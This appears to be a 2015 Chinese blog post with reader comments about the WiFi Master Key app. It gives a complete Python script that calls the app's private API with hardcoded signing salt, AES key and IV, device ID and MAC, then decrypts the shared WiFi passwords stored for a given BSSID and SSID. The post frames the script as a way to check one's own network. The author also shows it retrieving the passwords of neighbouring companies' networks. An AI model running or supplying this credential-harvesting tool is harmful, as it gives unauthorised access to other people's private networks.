WIFI万能钥匙Python查询脚本

最近声讨WIFI万能钥匙的声音越来越越多。这东西带来的安全性不必多说,但研究这个App还是十分有意思的。

其实在去年10月份左右,Hao Liu就已经把接口分析完毕。当时还没有iOS的非越狱版,Hao Liu猜测到了WIFI万能钥匙团队一定会通过大量的Android用户提供的密码,然后以LBS的形式出现在Apple App Store上。

个人观点,这东西还是谨慎使用为妙,尤其是在公司环境下。

现在提供一个查询密码的脚本,最初由Hao Liu编写,我做了一些改动。如果查询到自己的WIFI已经被分享,请立即修改密码。

关于查询的接口,一次可以进行多个BSSID/SSID组合的查询。如果要查询多个SSID,必须确保这些SSID至少在地域上不会有太远的距离(具体的范围没有进行过测试,至少成都的SSID+外地的SSID是不会查询成功的)。想做这个爬虫的人不少,但传统的要做爬虫效率不会太高,WIFI万能钥匙的查询至少要满足三个条件,即SSID、BSSID的组合,如果单次查询多个还会涉及到地理位置。也不是没有人使用过这个接口,之前有个新闻报道过某个WIFI万能钥匙的竞争对手被起诉的事情,猜测就是在自己的App内使用了WIFI万能钥匙的查询接口,这显然是最有效率、最经济的做法,但也最容易被抓到把柄。

当然,iOS版出来之后,有了新的方法,Hao Liu也摩拳擦掌准备进行POC,这个事情,就交给他来完成了。

截止北京时间2015年3月2日,14点30分,脚本依然能够正常使用。使用方法,修改代码wifi.add_ssid(“aa:bb:cc:dd:ee:ff”, “SSID_Name”),加入自己/要查询的BSSID和SSID组合。

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Created on 22:26 2015/2/11

__author__ = "TheCjw"

import collections
import hashlib
import json

import requests
from Crypto.Cipher import AES


class WifiDemo(object):
    def __init__(self):
        self.salt = "LQ9$ne@gH*Jq%KOL"
        self.request_url = "http://wifiapi02.51y5.net/wifiapi/fa.cmd"

        self.request_params = {}
        self.request_params["och"] = "wandoujia"
        self.request_params["ii"] = ""
        self.request_params["appid"] = "0001"
        # self.request_params["pid"] = "qryapwithoutpwd:commonswitch"
        self.request_params["pid"] = "qryapwd:commonswitch"
        self.request_params["lang"] = "cn"
        self.request_params["v"] = "633"
        self.request_params["uhid"] = "a0000000000000000000000000000001"
        # self.request_params["method"] = "getSecurityCheckSwitch"
        self.request_params["method"] = "getDeepSecChkSwitch"
        self.request_params["st"] = "m"
        self.request_params["chanid"] = "guanwang"

        # Fill these shit.
        self.request_params["sign"] = ""
        self.request_params["bssid"] = ""
        self.request_params["ssid"] = ""

        # device id.
        self.request_params["dhid"] = "4028b29d4b72236a014b780339777ef7"
        # device mac.
        self.request_params["mac"] = "d8:86:e6:6f:a8:7c"

        self.headers = {
            "Content-type": "application/x-www-form-urlencoded",
            "Host": "wifiapi02.51y5.net",
            "Accept": "text/plain"
        }

    def __sign__(self, data):
        return hashlib.md5(data.encode("utf-8")).hexdigest().upper()


    def __post__(self):
        r = requests.post(self.request_url, data=self.request_params, headers=self.headers)
        return r.text

    def __add_bssid__(self, bssid):
        self.request_params["bssid"] += bssid + ","

    def __add_ssid__(self, ssid):
        self.request_params["ssid"] += ssid + ","

    def __sign_data__(self):
        self.request_params["sign"] = ""
        value = ""
        for key in collections.OrderedDict(sorted(self.request_params.items())):
            value += self.request_params[key]
        value += self.salt
        return self.__sign__(value)

    def add_ssid(self, bssid, ssid):
        self.__add_bssid__(bssid)
        self.__add_ssid__(ssid)

    def request(self):
        self.request_params["sign"] = self.__sign_data__()
        ret_data = json.loads(self.__post__())
        if ret_data["retCd"] == "-1111":
            # update key and retry.
            self.salt = ret_data["retSn"]
            return self.request()
        elif ret_data["retCd"] == "0":
            self.salt = ret_data["retSn"]
            return ret_data


def main():
    wifi = WifiDemo()

    # Add BSSID & SSID
    wifi.add_ssid("aa:bb:cc:dd:ee:ff", "SSID_Name")

    result = wifi.request()

    if len(result["qryapwd"]["psws"]) == 0:
        print "Not found."
        return

    for info in result["qryapwd"]["psws"]:
        ssid = result["qryapwd"]["psws"][info]["ssid"]
        bssid = result["qryapwd"]["psws"][info]["bssid"]
        encrypt_data = result["qryapwd"]["psws"][info]["pwd"]

        cipher = AES.new(b"jh16@`~78vLsvpos", AES.MODE_CBC, b"j#bd0@vp0sj!3jnv")
        decrypt_data = cipher.decrypt(encrypt_data.decode("hex"))
        length = int(decrypt_data[:3])
        password = decrypt_data[3:][:length]

        print "ssid", ssid
        print "bssid", bssid
        print "password", password
        print


if __name__ == "__main__":
    main()

查询结果如下,这是我们隔壁和楼下公司的WIFI密码:

wifi_sharing

WIFI万能钥匙Python查询脚本》有10个想法

  1. 昨天还运行成功,今天就有以下错误了
    Traceback (most recent call last):
    File “w.py”, line 119, in
    main()
    File “w.py”, line 98, in main
    if len(result[“qryapwd”][“psws”]) == 0:
    KeyError: ‘psws’

    回复
          1. 贝某

            楼主,
            Hamster’s Blog – WiFi万能钥匙Python查询脚本 这个被和谐了。您那里有存的脚本吗?想研究一下他是如何生成dhid的。

kerwin进行回复取消回复